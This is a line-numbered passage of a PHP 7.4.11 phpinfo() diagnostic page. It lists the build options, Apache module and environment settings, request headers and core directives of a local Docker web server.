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" alt="PHP logo" /></a><h1 class="p">PHP Version 7.4.11</h1>
 29 | </td></tr>
 30 | </table>
 31 | <table>
 32 | <tr><td class="e">System </td><td class="v">Linux 0699e883b740 4.15.0-147-generic #151-Ubuntu SMP Fri Jun 18 19:21:19 UTC 2021 x86_64 </td></tr>
 33 | <tr><td class="e">Build Date </td><td class="v">Oct 13 2020 10:00:41 </td></tr>
 34 | <tr><td class="e">Configure Command </td><td class="v"> &#039;./configure&#039;  &#039;--build=x86_64-linux-gnu&#039; &#039;--with-config-file-path=/usr/local/etc/php&#039; &#039;--with-config-file-scan-dir=/usr/local/etc/php/conf.d&#039; &#039;--enable-option-checking=fatal&#039; &#039;--with-mhash&#039; &#039;--enable-ftp&#039; &#039;--enable-mbstring&#039; &#039;--enable-mysqlnd&#039; &#039;--with-password-argon2&#039; &#039;--with-sodium=shared&#039; &#039;--with-pdo-sqlite=/usr&#039; &#039;--with-sqlite3=/usr&#039; &#039;--with-curl&#039; &#039;--with-libedit&#039; &#039;--with-openssl&#039; &#039;--with-zlib&#039; &#039;--with-pear&#039; &#039;--with-libdir=lib/x86_64-linux-gnu&#039; &#039;--with-apxs2&#039; &#039;--disable-cgi&#039; &#039;build_alias=x86_64-linux-gnu&#039; </td></tr>
 35 | <tr><td class="e">Server API </td><td class="v">Apache 2.0 Handler </td></tr>
 36 | <tr><td class="e">Virtual Directory Support </td><td class="v">disabled </td></tr>
 37 | <tr><td class="e">Configuration File (php.ini) Path </td><td class="v">/usr/local/etc/php </td></tr>
 38 | <tr><td class="e">Loaded Configuration File </td><td class="v">(none) </td></tr>
 39 | <tr><td class="e">Scan this dir for additional .ini files </td><td class="v">/usr/local/etc/php/conf.d </td></tr>
 40 | <tr><td class="e">Additional .ini files parsed </td><td class="v">/usr/local/etc/php/conf.d/docker-php-ext-sodium.ini,
 41 | /usr/local/etc/php/conf.d/docker-php-ext-zip.ini
 42 |  </td></tr>
 43 | <tr><td class="e">PHP API </td><td class="v">20190902 </td></tr>
 44 | <tr><td class="e">PHP Extension </td><td class="v">20190902 </td></tr>
 45 | <tr><td class="e">Zend Extension </td><td class="v">320190902 </td></tr>
 46 | <tr><td class="e">Zend Extension Build </td><td class="v">API320190902,NTS </td></tr>
 47 | <tr><td class="e">PHP Extension Build </td><td class="v">API20190902,NTS </td></tr>
 48 | <tr><td class="e">Debug Build </td><td class="v">no </td></tr>
 49 | <tr><td class="e">Thread Safety </td><td class="v">disabled </td></tr>
 50 | <tr><td class="e">Zend Signal Handling </td><td class="v">enabled </td></tr>
 51 | <tr><td class="e">Zend Memory Manager </td><td class="v">enabled </td></tr>
 52 | <tr><td class="e">Zend Multibyte Support </td><td class="v">provided by mbstring </td></tr>
 53 | <tr><td class="e">IPv6 Support </td><td class="v">enabled </td></tr>
 54 | <tr><td class="e">DTrace Support </td><td class="v">disabled </td></tr>
 55 | <tr><td class="e">Registered PHP Streams</td><td class="v">https, ftps, compress.zlib, php, file, glob, data, http, ftp, phar, zip</td></tr>
 56 | <tr><td class="e">Registered Stream Socket Transports</td><td class="v">tcp, udp, unix, udg, ssl, tls, tlsv1.0, tlsv1.1, tlsv1.2, tlsv1.3</td></tr>
 57 | <tr><td class="e">Registered Stream Filters</td><td class="v">zlib.*, convert.iconv.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dechunk</td></tr>
 58 | </table>
 59 | <table>
 60 | <tr class="v"><td>
 61 | <a href="http://www.zend.com/"><img border="0" src="data:image/png;base64,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" alt="Zend logo" /></a>
 62 | This program makes use of the Zend Scripting Language Engine:<br />Zend&nbsp;Engine&nbsp;v3.4.0,&nbsp;Copyright&nbsp;(c)&nbsp;Zend&nbsp;Technologies<br /></td></tr>
 63 | </table>
 64 | <hr />
 65 | <h1>Configuration</h1>
 66 | <h2><a name="module_apache2handler">apache2handler</a></h2>
 67 | <table>
 68 | <tr><td class="e">Apache Version </td><td class="v">Apache/2.4.38 (Debian) </td></tr>
 69 | <tr><td class="e">Apache API Version </td><td class="v">20120211 </td></tr>
 70 | <tr><td class="e">Server Administrator </td><td class="v">webmaster@localhost </td></tr>
 71 | <tr><td class="e">Hostname:Port </td><td class="v">172.20.0.2:80 </td></tr>
 72 | <tr><td class="e">User/Group </td><td class="v">www-data(33)/33 </td></tr>
 73 | <tr><td class="e">Max Requests </td><td class="v">Per Child: 0 - Keep Alive: on - Max Per Connection: 100 </td></tr>
 74 | <tr><td class="e">Timeouts </td><td class="v">Connection: 300 - Keep-Alive: 5 </td></tr>
 75 | <tr><td class="e">Virtual Server </td><td class="v">Yes </td></tr>
 76 | <tr><td class="e">Server Root </td><td class="v">/etc/apache2 </td></tr>
 77 | <tr><td class="e">Loaded Modules </td><td class="v">core mod_so mod_watchdog http_core mod_log_config mod_logio mod_version mod_unixd mod_access_compat mod_alias mod_auth_basic mod_authn_core mod_authn_file mod_authz_core mod_authz_host mod_authz_user mod_autoindex mod_deflate mod_dir mod_env mod_filter mod_mime prefork mod_negotiation mod_php7 mod_reqtimeout mod_setenvif mod_status </td></tr>
 78 | </table>
 79 | <table>
 80 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
 81 | <tr><td class="e">engine</td><td class="v">1</td><td class="v">1</td></tr>
 82 | <tr><td class="e">last_modified</td><td class="v">0</td><td class="v">0</td></tr>
 83 | <tr><td class="e">xbithack</td><td class="v">0</td><td class="v">0</td></tr>
 84 | </table>
 85 | <h2>Apache Environment</h2>
 86 | <table>
 87 | <tr class="h"><th>Variable</th><th>Value</th></tr>
 88 | <tr><td class="e">HTTP_HOST </td><td class="v">127.0.0.1 </td></tr>
 89 | <tr><td class="e">HTTP_USER_AGENT </td><td class="v">curl/7.64.0 </td></tr>
 90 | <tr><td class="e">HTTP_ACCEPT </td><td class="v">*/* </td></tr>
 91 | <tr><td class="e">PATH </td><td class="v">/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin </td></tr>
 92 | <tr><td class="e">SERVER_SIGNATURE </td><td class="v">&lt;address&gt;Apache/2.4.38 (Debian) Server at 127.0.0.1 Port 80&lt;/address&gt;
 93 |  </td></tr>
 94 | <tr><td class="e">SERVER_SOFTWARE </td><td class="v">Apache/2.4.38 (Debian) </td></tr>
 95 | <tr><td class="e">SERVER_NAME </td><td class="v">127.0.0.1 </td></tr>
 96 | <tr><td class="e">SERVER_ADDR </td><td class="v">127.0.0.1 </td></tr>
 97 | <tr><td class="e">SERVER_PORT </td><td class="v">80 </td></tr>
 98 | <tr><td class="e">REMOTE_ADDR </td><td class="v">127.0.0.1 </td></tr>
 99 | <tr><td class="e">DOCUMENT_ROOT </td><td class="v">/var/www/html </td></tr>
100 | <tr><td class="e">REQUEST_SCHEME </td><td class="v">http </td></tr>
101 | <tr><td class="e">CONTEXT_PREFIX </td><td class="v"><i>no value</i> </td></tr>
102 | <tr><td class="e">CONTEXT_DOCUMENT_ROOT </td><td class="v">/var/www/html </td></tr>
103 | <tr><td class="e">SERVER_ADMIN </td><td class="v">webmaster@localhost </td></tr>
104 | <tr><td class="e">SCRIPT_FILENAME </td><td class="v">/var/www/html/phpinfo.php </td></tr>
105 | <tr><td class="e">REMOTE_PORT </td><td class="v">40012 </td></tr>
106 | <tr><td class="e">GATEWAY_INTERFACE </td><td class="v">CGI/1.1 </td></tr>
107 | <tr><td class="e">SERVER_PROTOCOL </td><td class="v">HTTP/1.1 </td></tr>
108 | <tr><td class="e">REQUEST_METHOD </td><td class="v">GET </td></tr>
109 | <tr><td class="e">QUERY_STRING </td><td class="v"><i>no value</i> </td></tr>
110 | <tr><td class="e">REQUEST_URI </td><td class="v">/phpinfo.php </td></tr>
111 | <tr><td class="e">SCRIPT_NAME </td><td class="v">/phpinfo.php </td></tr>
112 | </table>
113 | <h2>HTTP Headers Information</h2>
114 | <table>
115 | <tr class="h"><th colspan="2">HTTP Request Headers</th></tr>
116 | <tr><td class="e">HTTP Request </td><td class="v">GET /phpinfo.php HTTP/1.1 </td></tr>
117 | <tr><td class="e">Host </td><td class="v">127.0.0.1 </td></tr>
118 | <tr><td class="e">User-Agent </td><td class="v">curl/7.64.0 </td></tr>
119 | <tr><td class="e">Accept </td><td class="v">*/* </td></tr>
120 | <tr class="h"><th colspan="2">HTTP Response Headers</th></tr>
121 | <tr><td class="e">X-Powered-By </td><td class="v">PHP/7.4.11 </td></tr>
122 | </table>
123 | <h2><a name="module_core">Core</a></h2>
124 | <table>
125 | <tr><td class="e">PHP Version </td><td class="v">7.4.11 </td></tr>
126 | </table>
127 | <table>
128 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
129 | <tr><td class="e">allow_url_fopen</td><td class="v">On</td><td class="v">On</td></tr>
130 | <tr><td class="e">allow_url_include</td><td class="v">Off</td><td class="v">Off</td></tr>
131 | <tr><td class="e">arg_separator.input</td><td class="v">&amp;</td><td class="v">&amp;</td></tr>
132 | <tr><td class="e">arg_separator.output</td><td class="v">&amp;</td><td class="v">&amp;</td></tr>
133 | <tr><td class="e">auto_append_file</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
134 | <tr><td class="e">auto_globals_jit</td><td class="v">On</td><td class="v">On</td></tr>
135 | <tr><td class="e">auto_prepend_file</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
136 | <tr><td class="e">browscap</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
137 | <tr><td class="e">default_charset</td><td class="v">UTF-8</td><td class="v">UTF-8</td></tr>
138 | <tr><td class="e">default_mimetype</td><td class="v">text/html</td><td class="v">text/html</td></tr>
139 | <tr><td class="e">disable_classes</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
140 | <tr><td class="e">disable_functions</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
141 | <tr><td class="e">display_errors</td><td class="v">On</td><td class="v">On</td></tr>
142 | <tr><td class="e">display_startup_errors</td><td class="v">Off</td><td class="v">Off</td></tr>
143 | <tr><td class="e">doc_root</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
144 | <tr><td class="e">docref_ext</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
145 | <tr><td class="e">docref_root</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
146 | <tr><td class="e">enable_dl</td><td class="v">On</td><td class="v">On</td></tr>
147 | <tr><td class="e">enable_post_data_reading</td><td class="v">On</td><td class="v">On</td></tr>
